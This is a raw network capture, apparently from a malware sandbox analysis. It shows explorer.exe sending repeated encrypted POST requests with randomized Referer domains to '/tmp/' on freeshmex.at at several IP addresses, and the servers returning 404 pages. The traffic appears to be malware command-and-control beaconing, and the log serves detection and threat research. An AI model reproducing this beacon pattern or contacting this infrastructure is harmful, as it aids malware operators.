                                                        Nov 20, 2022 23:29:34.630990982 CET2024OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 1d 6b 2c 90 f5 76 0b 75 3c 23 a8 f4
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu<#9GwLi`R3>pt>aIKEG#%S"L
                                                        Nov 20, 2022 23:29:35.824575901 CET2025INHTTP/1.1 200 OK
                                                        Date: Sun, 20 Nov 2022 22:29:35 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 0
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        29192.168.2.449727210.182.29.7080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:36.126864910 CET2026OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://kqevfdrdxv.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 233
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:36.130844116 CET2026OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 12 6b 2c 90 f5 76 0b 75 74 24 a6 ab
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vut$VJmqX.K;ta)0+u*D7.IAHH+H)`^2][|StVAZwSxgD#}/
                                                        Nov 20, 2022 23:29:37.219599962 CET2027INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:36 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        3192.168.2.449700222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:00.905910015 CET151OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://svuhccb.net/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 316
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:00.906945944 CET152OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 0b 6b 2c 90 f5 76 0b 75 5b 5f c4 8b
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu[_p yO];-,cd7Jopdwi!TuXV ~ie\>1#^8;OC}*n:JB;vYZ8kq6F(
                                                        Nov 20, 2022 23:29:02.113181114 CET152INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:01 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        30192.168.2.449728222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:37.555684090 CET2028OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://hkqddhkgrs.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 360
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:37.555684090 CET2028OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 13 6b 2c 90 f5 76 0b 75 5f 4f a3 f7
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu_OE>NC(tx>B%+}yjeS<(4N3Ne6>2fJ=MK(aWP8YZ=i|xX^c r4h0.
                                                        Nov 20, 2022 23:29:38.738382101 CET2029INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:38 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        31192.168.2.449729190.147.188.5080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:38.939202070 CET2030OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://vppnf.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 163
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:38.939950943 CET2030OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 10 6b 2c 90 f5 76 0b 75 47 54 a5 b6
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuGTXHbLan*0~+.f[\@8JI?Va)5l
                                                        Nov 20, 2022 23:29:39.731589079 CET2031INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:39 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        32192.168.2.449730210.182.29.7080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:40.008032084 CET2032OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://jlawl.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 125
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:40.008094072 CET2032OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 11 6b 2c 90 f5 76 0b 75 41 5b a7 ae
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vuA[TSBW<UPwe63
                                                        Nov 20, 2022 23:29:40.836579084 CET2033INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:40 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        33192.168.2.449731210.182.29.7080C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:41.585199118 CET2034OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://lccctghley.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 230
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:41.585227013 CET2034OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 16 6b 2c 90 f5 76 0b 75 3b 4c dd 99
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu;LNVk\cK(B-X(f^9_hKG=PG)Iut_Ag)z5n:zM.~.*wx#l[
                                                        Nov 20, 2022 23:29:42.662532091 CET2035INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:42 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        34192.168.2.449732222.236.49.12380C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:42.980601072 CET2036OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://gkaof.com/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 353
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:42.981434107 CET2036OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 17 6b 2c 90 f5 76 0b 75 2c 15 cd ae
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu,Z/Sg]q7n2En/ezSGOX?.}9KK:Yh@pkR.*L>HuFAv2ckyij"s)Zp(i
                                                        Nov 20, 2022 23:29:44.183577061 CET2037INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:43 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        35192.168.2.449733175.119.10.23180C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:44.502536058 CET2038OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://wwdygs.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 177
                                                        Host: freeshmex.at
                                                        Nov 20, 2022 23:29:44.502643108 CET2038OUTData Raw: 3b 6e 58 19 f1 bb 60 27 a9 a3 c0 04 06 09 0b ce 0b 02 ce e4 6f 00 e4 15 0f 7e 09 90 37 b4 b5 6d 99 59 ce 5a 73 6d 22 1d 9f ee 3f c7 2a 24 da f7 60 aa 37 43 de 16 5b c0 7a 71 17 7f 4e e2 18 1d c7 41 20 ff 2d 5b 14 6b 2c 90 f5 76 0b 75 2d 47 ce f7
                                                        Data Ascii: ;nX`'o~7mYZsm"?*$`7C[zqNA -[k,vu-Gm+f~Vl~z\k.2{#]?y_,^N}W*4an\/P*/
                                                        Nov 20, 2022 23:29:45.687060118 CET2039INHTTP/1.0 404 Not Found
                                                        Date: Sun, 20 Nov 2022 22:29:45 GMT
                                                        Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.6.40
                                                        X-Powered-By: PHP/5.6.40
                                                        Content-Length: 331
                                                        Connection: close
                                                        Content-Type: text/html; charset=utf-8
                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e
                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/ was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>


                                                        Session IDSource IPSource PortDestination IPDestination PortProcess
                                                        4192.168.2.44970141.41.255.23580C:\Windows\explorer.exe
                                                        TimestampkBytes transferredDirectionData
                                                        Nov 20, 2022 23:29:02.219367981 CET153OUTPOST /tmp/ HTTP/1.1
                                                        Connection: Keep-Alive
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Accept: */*
                                                        Referer: http://xmevykp.org/
                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                        Content-Length: 320
                                                        Host: freeshmex.at
